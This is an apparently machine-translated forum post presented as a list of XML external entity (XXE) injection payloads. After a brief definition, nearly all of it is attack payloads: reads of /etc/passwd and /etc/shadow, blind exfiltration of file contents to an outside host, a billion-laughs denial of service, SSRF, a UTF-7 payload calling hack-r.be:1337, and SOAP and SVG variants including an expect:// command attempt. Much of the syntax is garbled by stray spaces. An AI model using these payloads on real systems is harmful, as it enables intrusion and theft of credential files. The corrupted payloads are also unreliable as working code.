List of payloads for injecting an external XML object (XXE)



  • In this section, we will explain what the implementation of external XML entities is, describe some common examples, explain how to find and use different types of XXE implementations, and summarize how to prevent XXE implementation attacks.

    What is the implementation of external XML entities?
    Embedding an external XML object (also known as XXE) is a web security vulnerability that could allow an attacker to interfere with the processing of XML data in an application.

    It often allows an attacker to view files in the application server file system and interact with any internal or external systems that the application itself can access.

    There are various types of XXE attacks:

    fb2ea245-6e04-4ac3-8e6f-a14d23cb3f93-image.png

    Injection of an external XML object (XXE)
    XXE: Basic XML Example

    <! -? xml version = "1.0"? ->
    <userInfo>
     <firstName> John </firstName>
     <lastName> Doe </lastName>
    </userInfo>
    XXE: Entity Example
    <! -? xml version = "1.0"? ->
    <! DOCTYPE replace [<! ENTITY example "Doe">]>
     <userInfo>
      <firstName> John </firstName>
      <lastName> & example; </lastName>
     </userInfo>
    XXE: file expansion
    <! -? xml version = "1.0"? ->
    <! DOCTYPE replace [<! ENTITY ent SYSTEM "file: /// etc / shadow">]>
    <userInfo>
     <firstName> John </firstName>
     <lastName> & ent; </lastName>
    </userInfo>
    XXE: Denial of Service Example
    <! -? xml version = "1.0"? ->
    <! DOCTYPE lolz [<! ENTITY lol "lol"> <! ELEMENT lolz (#PCDATA)>
    <! ENTITY lol1 "& lol; & lol; & lol; & lol; & lol; & lol; & lol;
    <! ENTITY lol2 "& lol1; & lol1; & lol1; & lol1; & lol1; & lol1; & lol1;">
    <! ENTITY lol3 "& lol2; & lol2; & lol2; & lol2; & lol2; & lol2; & lol2;">
    <! ENTITY lol4 "& lol3; & lol3; & lol3; & lol3; & lol3; & lol3; & lol3;">
    <! ENTITY lol5 "& lol4; & lol4; & lol4; & lol4; & lol4; & lol4; & lol4;">
    <! ENTITY lol6 "& lol5; & lol5; & lol5; & lol5; & lol5; & lol5; & lol5;">
    <! ENTITY lol7 "& lol6; & lol6; & lol6; & lol6; & lol6; & lol6; & lol6;">
    <! ENTITY lol8 "& lol7; & lol7; & lol7; & lol7; & lol7; & lol7; & lol7;">
    <! ENTITY lol9 "& lol8; & lol8; & lol8; & lol8; & lol8; & lol8; & lol8;">
    <tag> & lol9; </tag>
    XXE: Example of including a local file
    <? xml version = "1.0"?>
    <! DOCTYPE foo [
    <! ELEMENT foo (#ANY)>
    <! ENTITY xxe SYSTEM "file: /// etc / passwd">]> <foo> & xxe; </foo>
    

    XXE: an example of including a blind local file (when the first case returns nothing)

    <? xml version = "1.0"?>
    <! DOCTYPE foo [
    <! ELEMENT foo (#ANY)>
    <! ENTITY% xxe SYSTEM "file: /// etc / passwd">
    <! ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]> <foo> & blind; </foo>
    XXE: access control bypass (loading limited resources - PHP example)
    <? xml version = "1.0"?>
    <! DOCTYPE foo [
    <! ENTITY ac SYSTEM "php: //filter/read=convert.base64-encode/resource=http: //example.com/viewlog.php">]>
    <foo><result>∾</result> </foo>
    XXE: SSRF Example (Server-Side Request Forgery)
    <? xml version = "1.0"?>
    <! DOCTYPE foo [
    <! ELEMENT foo (#ANY)>
    <! ENTITY xxe SYSTEM "https://www.example.com/text.txt">]> <foo> & xxe; </foo>
    XXE: (Remote attack - via external XML inclusion)
    <? xml version = "1.0"?>
    <! DOCTYPE lolz [
    <! ENTITY test SYSTEM "https://example.com/entity1.xml">]>
    <lolz><lol>3..2..1...&test<lol> </lolz>
    XXE: UTF-7 Example
    <? xml version = "1.0" encoding = "UTF-7"?>
    + ADwAIQ-DOCTYPE foo + AFs + ADwAIQ-ELEMENT foo ANY + AD4
    + ADwAIQ-ENTITY xxe SYSTEM + ACI-http: //hack-r.be: 1337 + ACI + AD4AXQA +
    + ADw-foo + AD4AJg-xxe + ADsAPA- / foo + AD4
    XXE: Base64 encoded
    <! DOCTYPE test [<! ENTITY% init SYSTEM "data: // text / plain; base64, ZmlsZTovLy9ldGMvcGFzc3dk">% init; ]> <foo />
    Example XXE: XXE inside SOAP
    <soap: Body>
      <foo>
        <! [CDATA [<! DOCTYPE doc [<! ENTITY% dtd SYSTEM "http: //x.x.x.x: 22 /">% dtd;]> <xxx />]]>
      </foo>
    </ soap: Body>
    XXE: XXE inside SVG
    <svg xmlns = "http://www.w3.org/2000/svg" xmlns: xlink = "http://www.w3.org/1999/xlink" width = "300" version = "1.1" height = "200">
        <image xlink: href = "expect: // ls"> </image>
    </svg>

Log in to reply
 


LIVE Chat
Login in your account to Start Chat